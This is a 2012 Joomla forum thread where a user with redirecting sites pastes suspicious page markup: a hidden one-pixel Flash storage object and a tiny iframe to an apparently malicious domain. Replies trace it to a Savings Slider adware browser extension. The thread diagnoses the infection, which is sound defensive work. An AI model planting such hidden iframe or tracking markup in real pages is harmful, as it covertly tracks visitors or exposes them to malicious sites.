odd code in new installation of Joomla 2.5.7

Discussion regarding Joomla! 2.5 security issues.

Moderators: Bernard T, mandville, PhilD, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
aimlesslady
Joomla! Apprentice
Joomla! Apprentice
Posts: 41
Joined: Tue Sep 25, 2007 11:50 am

odd code in new installation of Joomla 2.5.7

Postby aimlesslady » Wed Oct 17, 2012 5:26 pm

I have several folders with both Joomla 1.5 and 2.5 sites, all using the latest version, on a shared server.My sites keep redirecting to msn.com, both the url for the front end or backend.I removed all files except the log file from the "root" and all the sites are in folders. If it is a live site, the url points directly to it. If it is a site I am still working on, I access it with the sub-domain and the name of the folder. I restored 2 of the sites because I had backups for them, so I just created a new database and folder and restored them. I will change the admin and password and add admin tools, which I hadn't done (and learned my lesson).

I do have one site that I have been working on and had not backed up yet (stupid, I know). I uploaded a clean htaccess file so I don't think the code is in there. So I will probably have to rebuild it from scratch. So I did a fresh installation of Joomla 2.5.7 with a new database in a new folder, and I noticed a strange thing. At the very top of the browser there a some small black squares right above the admin panel on the back end and at the top of the page on the front end. When I use firebug, I see the following, and it just doesn't seem right. . This is a new install without sample data.

Code: Select all

[size=85][size=85]!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-gb" dir="ltr" xml:lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" slick-uniqueid="3">
<head>
<body style="font-size: 100%;">
<div id="_GPL_e6a00_parent_div" style="position: absolute; top: 0px; left: 0px; width: 1px; height: 1px; z-index: 2147483647;">
<object id="_GPL_e6a00_swf" width="1" height="1" type="application/x-shockwave-flash" data="http://savingsslider-a.akamaihd.net/items/e6a00/storage.swf">
<param name="wmode" value="transparent">
<param name="allowscriptaccess" value="always">
<param name="flashvars" value="logfn=_GPL.items.e6a00.log&onload=_GPL.items.e6a00.onload&onerror=_GPL.items.e6a00.onerror&LSOName=gpl">
</object>
</div>
<iframe width="5" scrolling="auto" height="5" align="middle" frameborder="no" src="http://polarizebit.org/Lexmark?8">
<!DOCTYPE html>
<html class="blacklist" xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" href="chrome://global/skin/netError.css" type="text/css" media="all">
Filtered chrome url chrome://global/skin/netError.css
</link>
<link id="favicon" rel="icon" type="image/png" href="chrome://global/skin/icons/blacklist_favicon.png"/>
<script type="application/javascript">
// Error url MUST be formatted like this:
// about:blocked?e=error_code&u=url
// Note that this file uses document.documentURI to get
// the URL (with the format from above). This is because
// document.location.href gets the current URI off the docshell,
// which is the URL displayed in the location bar, i.e.
// the URI that the user attempted to load.
function getErrorCode()
{
var url = document.documentURI;
var error = url.search(/e\=/);
var duffUrl = url.search(/\&u\=/);
return decodeURIComponent(url.slice(error + 2, duffUrl));
}
function getURL()
{
var url = document.documentURI;
var match = url.match(/&u=([^&]+)&/);
// match == null if not found; if so, return an empty string
// instead of what would turn out to be portions of the URI
if (!match)
return "";
url = decodeURIComponent(match[1]);
// If this is a view-source page, then get then real URI of the page
if (/^view-source\:/.test(url))
url = url.slice(12);
return url;
}
/**
* Attempt to get the hostname via document.location. Fail back
* to getURL so that we always return something meaningful.
*/
function getHostString()
{
try {
return document.location.hostname;
} catch (e) {
return getURL();
}
}
function initPage()
{
// Handoff to the appropriate initializer, based on error code
switch (getErrorCode()) {
case "malwareBlocked" :
initPage_malware();
break;
case "phishingBlocked" :
initPage_phishing();
break;
}
}
/**
* Initialize custom strings and functionality for blocked malware case
*/
function initPage_malware()
{
// Remove phishing strings
var el = document.getElementById("errorTitleText_phishing");
el.parentNode.removeChild(el);
el = document.getElementById("errorShortDescText_phishing");
el.parentNode.removeChild(el);
el = document.getElementById("errorLongDescText_phishing");
el.parentNode.removeChild(el);
// Set sitename
document.getElementById("malware_sitename").textContent = getHostString();
document.title = document.getElementById("errorTitleText_malware")
.innerHTML;
}
/**
* Initialize custom strings and functionality for blocked phishing case
*/
function initPage_phishing()
{
// Remove malware strings
var el = document.getElementById("errorTitleText_malware");
el.parentNode.removeChild(el);
el = document.getElementById("errorShortDescText_malware");
el.parentNode.removeChild(el);
el = document.getElementById("errorLongDescText_malware");
el.parentNode.removeChild(el);
// Set sitename
document.getElementById("phishing_sitename").textContent = getHostString();
document.title = document.getElementById("errorTitleText_phishing")
.innerHTML;
}
</script>
<style type="text/css">
/* Style warning button to look like a small text link in the
bottom right. This is preferable to just using a text link
since there is already a mechanism in browser.js for trapping
oncommand events from unprivileged chrome pages (BrowserOnCommand).*/
#ignoreWarningButton {
-moz-appearance: none;
background: transparent;
border: none;
color: white; /* Hard coded because netError.css forces this page's background to dark red */
text-decoration: underline;
margin: 0;
padding: 0;
position: relative;
top: 23px;
left: 20px;
font-size: smaller;
}
#ignoreWarning {
text-align: right;
}
</style>
<title>Reported Attack Page!</title>
</head>
<body dir="ltr">
<div id="errorPageContainer">
<div id="errorTitle">
<h1 id="errorTitleText_malware">Reported Attack Page!</h1>
</div>
<div id="errorLongContent">
<div id="errorShortDesc">
<div id="errorLongDesc">
<div id="buttons">
</div>
<div id="ignoreWarning">
</div>
<script type="application/javascript">
</body>
</html>
</iframe>[/size][/size]



Is this normal? Do you think it is related to the redirect? Where is it coming from?How can I fix this?
The new install is http://s285641334.onlinehome.us/olio2/

The site that redirects to msn.com is http://s285641334.onlinehome.us/olio/

Someone please help!!!
Ellen

Tarufeti
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Wed Oct 17, 2012 9:09 pm

Re: odd code in new installation of Joomla 2.5.7

Postby Tarufeti » Wed Oct 17, 2012 9:11 pm

I have the same problem. Someone can help?

aimlesslady
Joomla! Apprentice
Joomla! Apprentice
Posts: 41
Joined: Tue Sep 25, 2007 11:50 am

Re: odd code in new installation of Joomla 2.5.7

Postby aimlesslady » Wed Oct 17, 2012 10:03 pm

Maybe this helps....

Forum Post Assistant (v1.2.3) : 17th October 2012 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.7-Stable (Ember) 13-September-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Writable (644) | Owner: u53517304 (uid: 1/gid: 1) | Group: ftpusers (gid: 1) | Valid For: 2.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: none | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux infong 2.4 #1 SMP Fri May 18 17:32:59 UTC 2012 i686 GNU/Linux | OS Version: Linux infong 2.4 #1 SMP Fri May 18 17:32:59 UTC 2012 i686 GNU/Linux | Technology: Linux infong 2.4 #1 SMP Fri May 18 17:32:59 UTC 2012 i686 GNU/Linux | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /kunden/homepages/35/d285641313/htdocs | System TMP Writable: Yes

PHP Configuration :: Version: 5.4.7 | PHP API: cgi-fcgi | Session Path Writable: Unknown | Display Errors: 1 | Error Reporting: 22519 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 40M | Max. POST Size: 8M | Max. Input Time: -1 | Max. Execution Time: 50000 | Memory Limit: 90M

MySQL Configuration :: Version: 5.0.91-log (Client:mysqlnd 5.0.10 - 20111026 - $Id: b0b3b15c693b7f6aeb3aa66b646fee339f175e39 $) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 622.27 KiB | #of Tables: 83
Detailed Environment :: wrote:PHP Extensions :: Core (5.4.7) | date (5.4.7) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7) | zlib (2.0) | bcmath () | bz2 () | calendar () | ctype () | curl () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | session () | intl (1.1.0) | json (1.2.1) | mbstring () | mcrypt () | standard (5.4.7) | mysqlnd (mysqlnd 5.0.10 - 20111026 - $Id: b0b3b15c693b7f6aeb3aa66b646fee339f175e39 $) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | Phar (2.0.1) | posix () | Reflection ($Id: 7c9981924ded1ad2023fb1d5c3d1a8f290632f5c $) | imap () | shmop () | SimpleXML (0.1) | soap () | mysqli (0.1) | exif (1.4 $Id$) | tidy (2.0) | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | mysql (1.0) | cgi-fcgi () | mhash () | Zend Engine (2.4.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) ::
Extensions Discovered :: wrote:Components :: SITE :: WF_AGGREGATOR_VIMEO_TITLE (2.2.8.3) | [youtube] (2.2.8.3) | WF_FILESYSTEM_JOOMLA_TITLE (2.2.8.3) | WF_LINKS_JOOMLALINKS_TITLE (2.2.8.3) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.2.8.3) | WF_POPUPS_JCEMEDIABOX_TITLE (2.2.8.3) | WF_POPUPS_WINDOW_TITLE (2.2.8.3) | WF_LINK_SEARCH_TITLE (2.2.8.3) | WF_ANCHOR_TITLE (2.2.8.3) | WF_ARTICLE_TITLE (2.2.8.3) | WF_AUTOSAVE_TITLE (2.2.8.3) | WF_BROWSER_TITLE (2.2.8.3) | WF_CAPTION_TITLE (2.0.3) | WF_CLEANUP_TITLE (2.2.8.3) | WF_CLIPBOARD_TITLE (2.2.8.3) | WF_CONTEXTMENU_TITLE (2.2.8.3) | WF_DIRECTIONALITY_TITLE (2.2.8.3) | WF_FULLSCREEN_TITLE (2.2.8.3) | WF_IMGMANAGER_TITLE (2.2.8.3) | WF_INLINEPOPUPS_TITLE (2.2.8.3) | [Do not buy our kitchens!] (2.2.8.3) | WF_LAYER_TITLE (2.2.8.3) | WF_LINK_TITLE (2.2.8.3) | WF_MEDIA_TITLE (2.2.8.3) | WF_MEDIAMANAGER_TITLE (2.0.7) | WF_NONBREAKING_TITLE (2.2.8.3) | WF_PREVIEW_TITLE (2.2.8.3) | WF_PRINT_TITLE (2.2.8.3) | WF_SEARCHREPLACE_TITLE (2.2.8.3) | WF_SOURCE_TITLE (2.2.8.3) | WF_SPELLCHECKER_TITLE (2.2.8.3) | WF_STYLE_TITLE (2.2.8.3) | WF_TABLE_TITLE (2.2.8.3) | WF_TEXTCASE_TITLE (2.2.8.3) | WF_VISUALBLOCKS_TITLE (2.2.8.3) | WF_VISUALCHARS_TITLE (2.2.8.3) | WF_XHTMLXTRAS_TITLE (2.2.8.3) | com_mailto (2.5.0) | com_wrapper (2.5.0) |
Components :: ADMIN :: com_admin (2.5.0) | Akeeba (3.6.7) | com_banners (2.5.0) | com_cache (2.5.0) | com_categories (2.5.0) | com_checkin (2.5.0) | com_config (2.5.0) | com_content (2.5.0) | com_cpanel (2.5.0) | eXtplorer (2.1.0RC5) | com_finder (2.5.0) | com_installer (2.5.0) | JCE (2.2.8.3) | Unknown (-) | Editor - JCE (2.2.8.3) | Editor - JCE (2.2.8.3) | JCE File Browser (2.0.0) | plg_quickicon_jcefilebrowser (2.5.0) | com_joomlaupdate (2.5.0) | com_languages (2.5.0) | com_login (2.5.0) | com_media (2.5.0) | com_menus (2.5.0) | com_messages (2.5.0) | com_modules (2.5.0) | Content - Multicategories (1.0.0) | Button - Multicategories (1.0.0) | COM_MULTICATEGORIES (1.0.2) | com_newsfeeds (2.5.0) | COM_OSTOOLBAR (1.5.7) | com_plugins (2.5.0) | com_redirect (2.5.0) | RSForm (1.4.0 R43) | com_search (2.5.0) | com_templates (2.5.0) | com_users (2.5.0) | com_weblinks (2.5.0) | Widgetkit (1.2.2) | com_xmap (2.2.1) |

Modules :: SITE :: mod_articles_archive (2.5.0) | mod_articles_categories (2.5.0) | mod_articles_category (2.5.0) | mod_articles_latest (2.5.0) | mod_articles_news (2.5.0) | mod_articles_popular (2.5.0) | mod_banners (2.5.0) | mod_breadcrumbs (2.5.0) | mod_custom (2.5.0) | mod_feed (2.5.0) | mod_finder (2.5.0) | mod_footer (2.5.0) | mod_languages (2.5.0) | mod_login (2.5.0) | mod_menu (2.5.0) | mod_random_image (2.5.0) | mod_related_items (2.5.0) | RSForm! Pro Module (1.3.0) | mod_search (2.5.0) | mod_stats (2.5.0) | mod_syndicate (2.5.0) | mod_users_latest (2.5.0) | mod_weblinks (2.5.0) | mod_whosonline (2.5.0) | Widgetkit (1.0.0) | Widgetkit Twitter (1.0.0) | mod_wrapper (2.5.0) |
Modules :: ADMIN :: mod_custom (2.5.0) | mod_feed (2.5.0) | mod_latest (2.5.0) | mod_logged (2.5.0) | mod_login (2.5.0) | mod_menu (2.5.0) | mod_multilangstatus (2.5.0) | mod_popular (2.5.0) | mod_quickicon (2.5.0) | mod_status (2.5.0) | mod_submenu (2.5.0) | mod_title (2.5.0) | mod_toolbar (2.5.0) | mod_version (2.5.0) |

Plugins :: SITE :: plg_authentication_gmail (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_ldap (2.5.0) | plg_captcha_recaptcha (2.5.0) | plg_content_emailcloak (2.5.0) | plg_content_finder (2.5.0) | plg_content_geshi (2.5.0) | plg_content_joomla (2.5.0) | plg_content_loadmodule (2.5.0) | Content - Multicategories (1.0.0) | plg_content_pagebreak (2.5.0) | plg_content_pagenavigation (2.5.0) | plg_content_vote (2.5.0) | Content - Widgetkit (1.0.0) | plg_editors_codemirror (1.0) | Editor - JCE (2.2.8.3) | plg_editors_tinymce (3.5.4.1) | plg_editors-xtd_article (2.5.0) | PLG_EDITORS-XTD_ARTICLESANYWHE (1.13.5) | plg_editors-xtd_image (2.5.0) | Button - Multicategories (1.0.0) | plg_editors-xtd_pagebreak (2.5.0) | plg_editors-xtd_readmore (2.5.0) | plg_extension_joomla (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_content (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_weblinks (2.5.0) | PLG_JMONITORING_AKEEBABACKUP_T (1.0) | plg_quickicon_extensionupdate (2.5.0) | plg_quickicon_jcefilebrowser (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_search_categories (2.5.0) | plg_search_contacts (2.5.0) | plg_search_content (2.5.0) | plg_search_newsfeeds (2.5.0) | plg_search_weblinks (2.5.0) | PLG_SYSTEM_ARTICLESANYWHERE (1.13.5) | plg_system_cache (2.5.0) | plg_system_debug (2.5.0) | plg_system_highlight (2.5.0) | System - JCE MediaBox (1.1.4) | plg_system_languagecode (2.5.0) | plg_system_languagefilter (2.5.0) | plg_system_log (2.5.0) | plg_system_logout (2.5.0) | PLG_SYSTEM_NNFRAMEWORK (12.1.3) | plg_system_p3p (2.5.0) | plg_system_redirect (2.5.0) | plg_system_remember (2.5.0) | plg_system_sef (2.5.0) | System - Widgetkit Joomla (1.0.0) | System - Widgetkit (1.0.0) | System - Widgetkit ZOO (1.0.0) | plg_user_contactcreator (2.5.0) | plg_user_joomla (2.5.0) | plg_user_profile (2.5.0) | Xmap - Content Plugin (2.0.3) | Xmap - Kunena Plugin (2.0.2) | Xmap - Mosets Tree Plugin (2.0.2) | Xmap - SobiPro Plugin (2.0.1) | Xmap - Virtuemart Plugin (2.0.0) | Xmap - WebLinks Plugin (2.0) |
Templates Discovered :: wrote:Templates :: SITE :: atomic (2.5.0) | beez5 (2.5.0) | beez_20 (2.5.0) | yoo_master (1.0.0) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |

raydesign
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sat Nov 03, 2012 7:27 pm

Re: odd code in new installation of Joomla 2.5.7

Postby raydesign » Sat Nov 03, 2012 7:29 pm

Any new on this matter ??
I have the same issue on several sites.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 13546
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: odd code in new installation of Joomla 2.5.7

Postby mandville » Sat Nov 03, 2012 9:28 pm

please go through the sticky - before you post read this and security checklist 7

hackers seldom redirect to msn as it does not give them any profit or fame
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security forums Moderator}

User avatar
kenmcd
Joomla! Champion
Joomla! Champion
Posts: 5672
Joined: Thu Aug 18, 2005 2:09 am
Location: California
Contact:

Re: odd code in new installation of Joomla 2.5.7

Postby kenmcd » Wed Nov 07, 2012 7:04 am

.
This is most likely a problem in the user's browser, not in Joomla.
I see no such code in Firefox, Opera, or IE.

The SWF file being loaded (storage.swf) is part of SwfStore (uses JavaScript to store info in LSOs, "Flash-cookies").
SwfStore is commonly used by various nefarious folks such sleazy browser toolbars and advertising networks.

The link to the file provides a clue:
h##p://savingsslider-a.akamaihd.net/items/e6a00/storage.swf

Savings Slider is a browser add-on to "help" you shop with coupons.

Remove the offending toolbar and/or other extensions and the issue should go away.

.
██ LibreTraining

User avatar
ahwoogamac
Joomla! Apprentice
Joomla! Apprentice
Posts: 23
Joined: Mon Sep 12, 2005 9:41 pm
Location: Atlanta, GA
Contact:

Re: odd code in new installation of Joomla 2.5.7

Postby ahwoogamac » Mon Nov 26, 2012 9:42 pm

Kenmcd is right on. Same thing happened to me. Then I looked in Chromes Extensions and found this:

Savings-Slider 2.3
Savings-Slider will help you save money when shopping online. When alerted that there are coupons available, simply click on "View All Available Coupons" for all the deals on the site you're browsing. Click the coupon to apply automatically! Savings-Slider is ad-supported software that is provided at no cost and may display advertisements in websites as you view them.
http://www.planetbobstudios.com

Akima: You can't call a planet "Bob."
Cale: So now you're the boss. You're the King of Bob.... No one said you have to live on Bob.


Return to “Security in Joomla! 2.5”

Who is online

Users browsing this forum: No registered users and 7 guests